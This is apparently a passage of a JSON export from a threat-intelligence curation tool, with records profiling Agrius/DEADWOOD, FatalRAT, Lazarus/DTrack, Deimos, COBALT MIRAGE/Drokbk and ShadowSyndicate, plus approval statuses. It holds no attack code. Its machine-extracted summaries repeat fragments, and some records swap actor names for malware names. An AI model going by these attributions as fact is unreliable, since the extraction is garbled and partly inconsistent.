\"Detbosit\"], \"vulnerabilities\": [], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Agrius\"], \"aliases\": [\"DEADWOOD\", \"Detbosit\"], \"country_of_origin\": [], \"target_countries\": [\"SA\"], \"target_regions\": [\"middle-east\"], \"threat_actor_overview\": [\"Agrius is a threat actor that utilized DEADWOOD (aka Detbosit)\", \" a wiper malware written in C++ using the Boost libraries. This wiper was involved in a wiping attack in Saudi Arabia in 2019. The malware operates based on a configuration file\", \" which lists which functionalities to execute. The malware attempts to overwrite files using random data\", \" making it look like ransomware. However\", \" unlike ransomware\", \" data wiped by DEADWOOD can not be recovered by the threat actor.\", \" which lists which functionalities to execute. The configuration file for newer DEADWOOD samples is embedded within the executable as a resource named METADATA\", \" encrypted using AES.\", \" making it look like ransomware\", \" but unlike ransomware\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Damage and Destruction\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [], \"attack_mitigations\": [], \"attack_consequences\": [\"The impact of the malware might actually look like ransomware\", \" as random data is written over the original content of the files without deleting them. Unlike ransomware\", \" however\", \" data wiped by DEADWOOD can not be recovered by the threat actor (it can only be restored from a previous backup\", \" if one exists)\"], \"vulnerabilities\": [], \"sources\": []}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:03:26.366Z"
  },
  "approval_message": "Needs more detail",
  "change_log": [
    {
      "_id": {
        "$oid": "650b5d0954d5ba1acf50585a"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-20T20:58:49.707Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Agrius",
          "updated_value": "Deadwood"
        }
      ]
    }
  ],
  "threat_actor": "Deadwood"
},
{
  "_id": {
    "$oid": "650c6b10e0f1992507c77de8"
  },
  "report": {
    "$oid": "650c6ad4d0caba483415d983"
  },
  "threat_actor_overview": "FatalRAT is a remote access trojan with a wide set of capabilities that can be executed remotely by an attacker. The malware runs several tests before fully infecting a system,  checking the existence of multiple virtual machine products,  disk space,  number of physical processors,  and more.,  and more. It is capable of performing defense evasion techniques,  obtaining system persistence,  logging user keystrokes,  collecting system information,  exfiltrating over encrypted command and control (C&C) channel.",
  "aliases": [],
  "sources": [
    "AT&T Alien Labs"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Information Theft",
    "Credential Harvesting"
  ],
  "threat_actor_capabilities": [
    "T1497.001",
    "T1027",
    "T1112",
    "T1056.001",
    "T1547.001",
    "T1569.002",
    "T1020",
    "T1562.001",
    "T1573.001",
    "T1119"
  ],
  "threat_actor_resources": [],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Do not click links or install software from unknown sources., Install an antivirus and keep your system updated., Always use an endpoint detection and response (EDR) solution or enable system log monitoring to allow SIEM correlation., Monitor network traffic to command and control (C&C) patterns.",
  "attack_consequences": "System persistence, Logging user keystrokes, Collecting system information, Exfiltrating over encrypted command and control (C&C) channel, Disabling computer lockdown, Deleting user info for specific browsers",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"FatalRAT\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Do not click links or install software from unknown sources., Install an antivirus and keep your system updated., Always use an endpoint detection and response (EDR) solution or enable system log monitoring to allow SIEM correlation., Monitor network traffic to command and control (C&C) patterns.\", \"attack_consequences\": \"System persistence, Logging user keystrokes, Collecting system information, Exfiltrating over encrypted command and control (C&C) channel, Disabling computer lockdown, Deleting user info for specific browsers\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"FatalRAT is a remote access trojan with a wide set of capabilities that can be executed remotely by an attacker. The malware runs several tests before fully infecting a system,  checking the existence of multiple virtual machine products,  disk space,  number of physical processors,  and more.,  and more. It is capable of performing defense evasion techniques,  obtaining system persistence,  logging user keystrokes,  collecting system information,  exfiltrating over encrypted command and control (C&C) channel.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Credential Harvesting\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [\"T1497.001\", \"T1027\", \"T1112\", \"T1056.001\", \"T1547.001\", \"T1569.002\", \"T1020\", \"T1562.001\", \"T1573.001\", \"T1119\"], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"AT&T Alien Labs\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"FatalRAT\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"FatalRAT is a remote access trojan with a wide set of capabilities that can be executed remotely by an attacker. The malware runs several tests before fully infecting a system\", \" checking the existence of multiple virtual machine products\", \" disk space\", \" number of physical processors\", \" and more.\", \" and more. It is capable of performing defense evasion techniques\", \" obtaining system persistence\", \" logging user keystrokes\", \" collecting system information\", \" exfiltrating over encrypted command and control (C&C) channel.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Information Theft\", \"Credential Harvesting\"], \"threat_actor_capabilities\": [\"T1497.001\", \"T1027\", \"T1112\", \"T1056.001\", \"T1547.001\", \"T1569.002\", \"T1020\", \"T1562.001\", \"T1573.001\", \"T1119\"], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [\"Do not click links or install software from unknown sources.\", \"Install an antivirus and keep your system updated.\", \"Always use an endpoint detection and response (EDR) solution or enable system log monitoring to allow SIEM correlation.\", \"Monitor network traffic to command and control (C&C) patterns.\"], \"attack_consequences\": [\"System persistence\", \"Logging user keystrokes\", \"Collecting system information\", \"Exfiltrating over encrypted command and control (C&C) channel\", \"Disabling computer lockdown\", \"Deleting user info for specific browsers\"], \"vulnerabilities\": [], \"sources\": [\"AT&T Alien Labs\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:04:02.090Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "FatalRAT"
},
{
  "_id": {
    "$oid": "650c943d2dde3bdc596b40b2"
  },
  "report": {
    "$oid": "650c9410ab1fab17048d3e49"
  },
  "threat_actor_overview": "The Lazarus Group,  also known as Andariel and Wassonite,  is a North Korean hacking group known for its use of the DTrack backdoor. The group targets a wide range of sectors and regions,  and its operations have expanded to Europe and Latin America. The group is known for its financial motivations and its use of sophisticated obfuscation techniques.,  and its operations have expanded to Europe and Latin America. The group uses DTrack to upload,  download,  start or delete files on the victim host,  and it has been used in attacks on ATMs,  nuclear power plants,  and in targeted ransomware attacks.",
  "aliases": [
    "Andariel",
    "Wassonite"
  ],
  "sources": [],
  "country_of_origin": "KP",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "DE",
    "BR",
    "IN",
    "IT",
    "MX",
    "CH",
    "SA",
    "TR",
    "US"
  ],
  "target_regions": [
    "europe",
    "americas",
    "asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ef2d23ce-63f5-4f4e-b0fa-d09a5d743cc8",
    "x-industry-sector--9ec6b337-b075-4143-8bda-13b2fdeea8f1",
    "x-industry-sector--91fac210-8e3c-4436-9b67-63fb3cdc55a2",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
    "x-industry-sector--532c8286-2c6e-4ad3-8ffd-6d2d49f1b757"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-2022-27925",
    "CVE-2022-37042"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Lazarus Group\", \"country_of_origin\": \"KP\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Lazarus Group,  also known as Andariel and Wassonite,  is a North Korean hacking group known for its use of the DTrack backdoor. The group targets a wide range of sectors and regions,  and its operations have expanded to Europe and Latin America. The group is known for its financial motivations and its use of sophisticated obfuscation techniques.,  and its operations have expanded to Europe and Latin America. The group uses DTrack to upload,  download,  start or delete files on the victim host,  and it has been used in attacks on ATMs,  nuclear power plants,  and in targeted ransomware attacks.\", \"target_countries\": [\"DE\", \"BR\", \"IN\", \"IT\", \"MX\", \"CH\", \"SA\", \"TR\", \"US\"], \"target_regions\": [\"europe\", \"americas\", \"asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [\"education\", \"chemical\", \"government-public-services\", \"telecommunications\", \"utilities\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Andariel\", \"Wassonite\"], \"vulnerabilities\": [\"CVE-2022-27925\", \"CVE-2022-37042\"], \"sources\": []}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Lazarus Group\"], \"aliases\": [\"Andariel\", \"Wassonite\"], \"country_of_origin\": [\"KP\"], \"target_countries\": [\"DE\", \"BR\", \"IN\", \"IT\", \"MX\", \"CH\", \"SA\", \"TR\", \"US\"], \"target_regions\": [\"europe\", \"americas\", \"asia\"], \"threat_actor_overview\": [\"The Lazarus Group\", \" also known as Andariel and Wassonite\", \" is a North Korean hacking group known for its use of the DTrack backdoor. The group targets a wide range of sectors and regions\", \" and its operations have expanded to Europe and Latin America. The group is known for its financial motivations and its use of sophisticated obfuscation techniques.\", \" and its operations have expanded to Europe and Latin America. The group uses DTrack to upload\", \" download\", \" start or delete files on the victim host\", \" and it has been used in attacks on ATMs\", \" nuclear power plants\", \" and in targeted ransomware attacks.\"], \"target_populations\": [], \"target_industry_sectors\": [\"education\", \"chemical\", \"government-public-services\", \"telecommunications\", \"utilities\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [\"CVE-2022-27925\", \"CVE-2022-37042\"], \"sources\": []}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:04:23.477Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "650c9450ab1fab17048d3e4a"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-21T19:06:56.243Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Lazarus Group",
          "updated_value": "DTrack"
        }
      ]
    }
  ],
  "threat_actor": "DTrack"
},
{
  "_id": {
    "$oid": "6511c253f5bde9c9adbf8f99"
  },
  "report": {
    "$oid": "6511c1eaa0cc2d726eb80398"
  },
  "threat_actor_overview": "The Deimos implant is a new,  complex form of malware first reported in 2020. This remote access tool is under active development,  with the aim of evading detection by using multiple layers of complex obfuscation and encryption techniques., The threat actor has used the .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have modified the malware to make it harder to detect,  indicating a motivation to maintain the malware. The malware has been observed in 10 unique organizations across multiple verticals,  indicating a broad target base. The threat actor has used the same IP address (216.230.232.134) in their campaign., The threat actor uses a .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have spent time modifying the malware to make it harder to detect,  indicating that they're incentivized to maintain the malware for financial gain., The threat actor has been observed modifying malware to make it harder to detect,  indicating a motivation to maintain the malware for financial gain. The actor uses the .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. The actor also appears well-versed with the bureaucracies and laws required in registering a foreign-owned business in Slovakia,  suggesting a level of sophistication., The threat actor has been observed using a .NET hardening tool,  Dotfuscator CE 6.3.0,  to hinder malware analysis. They have also modified the malware to make it harder to detect,  indicating a motivation to maintain the malware. The malware has been observed across multiple organizations,  indicating a broad,  non-targeted approach., The threat actor has used a .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have modified the malware to make it harder to detect,  indicating a motivation to maintain the malware. The malware is not targeted and has been observed in 10 unique organizations across multiple verticals. The malware uses a complex persistence mechanism and can perform any action at its privilege level.",
  "aliases": [
    "Jupyter Infostealer",
    "Yellow Cockatoo",
    "SolarMarker"
  ],
  "sources": [
    "Morphisec",
    "Binary Defense",
    "Squibydoo"
  ],
  "country_of_origin": "US",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "hacker",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US"
  ],
  "target_regions": [
    "americas"
  ],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "The Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure,  allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant., Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure, allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant., A takedown request of the IP address associated with the malware was initiated and successfully executed on September 21,  2021,  which has removed the observed C2 infrastructure access to any implants., A successful takedown request of the IP address associated with the campaign was initiated on September 21,  removing the observed C2 infrastructure access to any implants.",
  "attack_consequences": "The implant provides initial access,  persistence,  and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection., The implant provides initial access, persistence, and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection., The malware provides a general-purpose implant that can perform any action at its privilege level,  including receiving and executing a Windows PE file,  a PowerShell script,  a .Net DLL assembly,  or running arbitrary PowerShell commands.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Deimos\", \"country_of_origin\": \"US\", \"attack_mitigations\": \"The Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure,  allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant., Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure, allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant., A takedown request of the IP address associated with the malware was initiated and successfully executed on September 21,  2021,  which has removed the observed C2 infrastructure access to any implants., A successful takedown request of the IP address associated with the campaign was initiated on September 21,  removing the observed C2 infrastructure access to any implants.\", \"attack_consequences\": \"The implant provides initial access,  persistence,  and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection., The implant provides initial access, persistence, and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection., The malware provides a general-purpose implant that can perform any action at its privilege level,  including receiving and executing a Windows PE file,  a PowerShell script,  a .Net DLL assembly,  or running arbitrary PowerShell commands.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Deimos implant is a new,  complex form of malware first reported in 2020. This remote access tool is under active development,  with the aim of evading detection by using multiple layers of complex obfuscation and encryption techniques., The threat actor has used the .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have modified the malware to make it harder to detect,  indicating a motivation to maintain the malware. The malware has been observed in 10 unique organizations across multiple verticals,  indicating a broad target base. The threat actor has used the same IP address (216.230.232.134) in their campaign., The threat actor uses a .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have spent time modifying the malware to make it harder to detect,  indicating that they're incentivized to maintain the malware for financial gain., The threat actor has been observed modifying malware to make it harder to detect,  indicating a motivation to maintain the malware for financial gain. The actor uses the .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. The actor also appears well-versed with the bureaucracies and laws required in registering a foreign-owned business in Slovakia,  suggesting a level of sophistication., The threat actor has been observed using a .NET hardening tool,  Dotfuscator CE 6.3.0,  to hinder malware analysis. They have also modified the malware to make it harder to detect,  indicating a motivation to maintain the malware. The malware has been observed across multiple organizations,  indicating a broad,  non-targeted approach., The threat actor has used a .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have modified the malware to make it harder to detect,  indicating a motivation to maintain the malware. The malware is not targeted and has been observed in 10 unique organizations across multiple verticals. The malware uses a complex persistence mechanism and can perform any action at its privilege level.\", \"target_countries\": [\"US\"], \"target_regions\": [\"americas\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"hacker\", \"unknown\"], \"aliases\": [\"Jupyter Infostealer\", \"Yellow Cockatoo\", \"SolarMarker\"], \"vulnerabilities\": [], \"sources\": [\"Morphisec\", \"Binary Defense\", \"Squibydoo\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Deimos\"], \"aliases\": [\"Jupyter Infostealer\", \"Yellow Cockatoo\", \"SolarMarker\"], \"country_of_origin\": [\"US\"], \"target_countries\": [\"US\"], \"target_regions\": [\"americas\"], \"threat_actor_overview\": [\"The Deimos implant is a new\", \" complex form of malware first reported in 2020. This remote access tool is under active development\", \" with the aim of evading detection by using multiple layers of complex obfuscation and encryption techniques.\", \"The threat actor has used the .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have modified the malware to make it harder to detect\", \" indicating a motivation to maintain the malware. The malware has been observed in 10 unique organizations across multiple verticals\", \" indicating a broad target base. The threat actor has used the same IP address (216.230.232.134) in their campaign.\", \"The threat actor uses a .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have spent time modifying the malware to make it harder to detect\", \" indicating that they're incentivized to maintain the malware for financial gain.\", \"The threat actor has been observed modifying malware to make it harder to detect\", \" indicating a motivation to maintain the malware for financial gain. The actor uses the .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. The actor also appears well-versed with the bureaucracies and laws required in registering a foreign-owned business in Slovakia\", \" suggesting a level of sophistication.\", \"The threat actor has been observed using a .NET hardening tool\", \" Dotfuscator CE 6.3.0\", \" to hinder malware analysis. They have also modified the malware to make it harder to detect\", \" indicating a motivation to maintain the malware. The malware has been observed across multiple organizations\", \" indicating a broad\", \" non-targeted approach.\", \"The threat actor has used a .NET hardening tool Dotfuscator CE 6.3.0 to hinder malware analysis. They have modified the malware to make it harder to detect\", \" indicating a motivation to maintain the malware. The malware is not targeted and has been observed in 10 unique organizations across multiple verticals. The malware uses a complex persistence mechanism and can perform any action at its privilege level.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Information Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\", \"intermediate\"], \"threat_actor_type\": [\"hacker\", \"unknown\"], \"attack_mitigations\": [\"The Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure\", \" allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant.\", \"Elastic Security team recently completed a successful takedown of the observed command and control (C2) infrastructure, allowing us to provide detection rules and hunting techniques to aid in identifying this powerful implant.\", \"A takedown request of the IP address associated with the malware was initiated and successfully executed on September 21\", \" 2021\", \" which has removed the observed C2 infrastructure access to any implants.\", \"A successful takedown request of the IP address associated with the campaign was initiated on September 21\", \" removing the observed C2 infrastructure access to any implants.\"], \"attack_consequences\": [\"The implant provides initial access\", \" persistence\", \" and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection.\", \"The implant provides initial access, persistence, and C2 functions. This makes the implant powerful in that it can be used to accomplish any tasks that require remote access. It is likely that these intrusions are the beginning of a concentrated campaign against the victims or will be sold off in bulk for other campaigns unassociated with the access collection.\", \"The malware provides a general-purpose implant that can perform any action at its privilege level\", \" including receiving and executing a Windows PE file\", \" a PowerShell script\", \" a .Net DLL assembly\", \" or running arbitrary PowerShell commands.\"], \"vulnerabilities\": [], \"sources\": [\"Morphisec\", \"Binary Defense\", \"Squibydoo\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-10-02T19:04:57.538Z"
  },
  "approval_message": "Needs more threat insight details and scope of attack is empty.",
  "change_log": [],
  "threat_actor": "Deimos"
},
{
  "_id": {
    "$oid": "6511fda3153e11d1068d0cc3"
  },
  "report": {
    "$oid": "6511fd761e5e587e4d3b5c98"
  },
  "threat_actor_overview": "COBALT MIRAGE is a threat group sponsored by the Iranian government. They operate the Drokbk malware,  which is written in .NET and is made up of a dropper and a payload. The malware has limited built-in functionality and primarily executes additional commands or code from the command and control (C2) server., COBALT MIRAGE is a threat group sponsored by the Iranian government. It operates the Drokbk malware and is divided into subgroups,  one of which is known as Cluster B. The group primarily targets U.S. local government networks., COBALT MIRAGE is a threat group sponsored by the Iranian government. It operates the Drokbk malware",
  "aliases": [
    "Cluster B"
  ],
  "sources": [
    "Secureworks Counter Threat Unit (CTU)"
  ],
  "country_of_origin": "IR",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Information Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US"
  ],
  "target_regions": [
    "americas",
    "northern-america"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--2ee175fb-298f-43e8-a76c-8c02638598c5"
  ],
  "attack_mitigations": "Review and restrict access using the indicators listed in Table 1, To mitigate exposure to this malware,  CTU researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. Note that IP addresses can be reallocated. The domains,  IP addresses,  and URL may contain malicious content,  so consider the risks before opening them in a browser.",
  "attack_consequences": "",
  "vulnerabilities": [
    "CVE-2021-44228",
    "CVE-2021-45046"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"COBALT MIRAGE\", \"country_of_origin\": \"IR\", \"attack_mitigations\": \"Review and restrict access using the indicators listed in Table 1, To mitigate exposure to this malware,  CTU researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. Note that IP addresses can be reallocated. The domains,  IP addresses,  and URL may contain malicious content,  so consider the risks before opening them in a browser.\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"COBALT MIRAGE is a threat group sponsored by the Iranian government. They operate the Drokbk malware,  which is written in .NET and is made up of a dropper and a payload. The malware has limited built-in functionality and primarily executes additional commands or code from the command and control (C2) server., COBALT MIRAGE is a threat group sponsored by the Iranian government. It operates the Drokbk malware and is divided into subgroups,  one of which is known as Cluster B. The group primarily targets U.S. local government networks., COBALT MIRAGE is a threat group sponsored by the Iranian government. It operates the Drokbk malware\", \"target_countries\": [\"US\"], \"target_regions\": [\"americas\", \"northern-america\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\"], \"target_industry_sectors\": [\"government-local\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Cluster B\"], \"vulnerabilities\": [\"CVE-2021-44228\", \"CVE-2021-45046\"], \"sources\": [\"Secureworks Counter Threat Unit (CTU)\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"COBALT MIRAGE\"], \"aliases\": [\"Cluster B\"], \"country_of_origin\": [\"IR\"], \"target_countries\": [\"US\"], \"target_regions\": [\"americas\", \"northern-america\"], \"threat_actor_overview\": [\"COBALT MIRAGE is a threat group sponsored by the Iranian government. They operate the Drokbk malware\", \" which is written in .NET and is made up of a dropper and a payload. The malware has limited built-in functionality and primarily executes additional commands or code from the command and control (C2) server.\", \"COBALT MIRAGE is a threat group sponsored by the Iranian government. It operates the Drokbk malware and is divided into subgroups\", \" one of which is known as Cluster B. The group primarily targets U.S. local government networks.\", \"COBALT MIRAGE is a threat group sponsored by the Iranian government. It operates the Drokbk malware\"], \"target_populations\": [], \"target_industry_sectors\": [\"government-local\"], \"threat_actor_intent\": [\"Information Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [\"Review and restrict access using the indicators listed in Table 1\", \"To mitigate exposure to this malware\", \" CTU researchers recommend that organizations use available controls to review and restrict access using the indicators listed in Table 1. Note that IP addresses can be reallocated. The domains\", \" IP addresses\", \" and URL may contain malicious content\", \" so consider the risks before opening them in a browser.\"], \"attack_consequences\": [], \"vulnerabilities\": [\"CVE-2021-44228\", \"CVE-2021-45046\"], \"sources\": [\"Secureworks Counter Threat Unit (CTU)\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-27T20:49:28.522Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "6511fdca1e5e587e4d3b5c99"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-25T21:38:18.632Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "COBALT MIRAGE",
          "updated_value": "Drokbk"
        }
      ]
    }
  ],
  "threat_actor": "Drokbk"
},
{
  "_id": {
    "$oid": "6512ee4f7fbbd0c5aedf3727"
  },
  "report": {
    "$oid": "6512edf4c12f2c67e0da8899"
  },
  "threat_actor_overview": "ShadowSyndicate is a threat actor that has been linked to multiple ransomware operations. They have been associated with the use of seven different ransomware families in attacks over the past year. The threat actor could be an initial access broker (IAB),  although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations.,  although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations. The researchers base their conclusions on a distinct SSH fingerprint they discovered on 85 IP servers,  most of them tagged as Cobalt Strike command and control machines., ShadowSyndicate is a threat actor that has been linked to multiple ransomware operations. They have been associated with the use of seven different ransomware families in attacks over the past year. The group is believed to be an initial access broker (IAB),  but evidence also suggests that they are an affiliate to multiple ransomware operations. The group's activities have been traced back to 85 IP servers,  most of which are tagged as Cobalt Strike command and control machines.",
  "aliases": [
    "Infra Storm"
  ],
  "sources": [
    "Bleeping Computer",
    "Group-IB",
    "Bridewell",
    "Michael Koczwara"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"ShadowSyndicate\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"ShadowSyndicate is a threat actor that has been linked to multiple ransomware operations. They have been associated with the use of seven different ransomware families in attacks over the past year. The threat actor could be an initial access broker (IAB),  although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations.,  although evidence suggests that ShadowSyndicate is an affiliate to multiple ransomware operations. The researchers base their conclusions on a distinct SSH fingerprint they discovered on 85 IP servers,  most of them tagged as Cobalt Strike command and control machines., ShadowSyndicate is a threat actor that has been linked to multiple ransomware operations. They have been associated with the use of seven different ransomware families in attacks over the past year. The group is believed to be an initial access broker (IAB),  but evidence also suggests that they are an affiliate to multiple ransomware operations. The group's activities have been traced back to 85 IP servers,  most of which are tagged as Cobalt Strike command and control machines.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [\"unknown\", \"crime-syndicate\"], \"aliases\": [\"Infra Storm\"], \"vulnerabilities\": [], \"sources\": [\"Group-IB\", \"Bridewell\", \"Michael Koczwara\"]}",
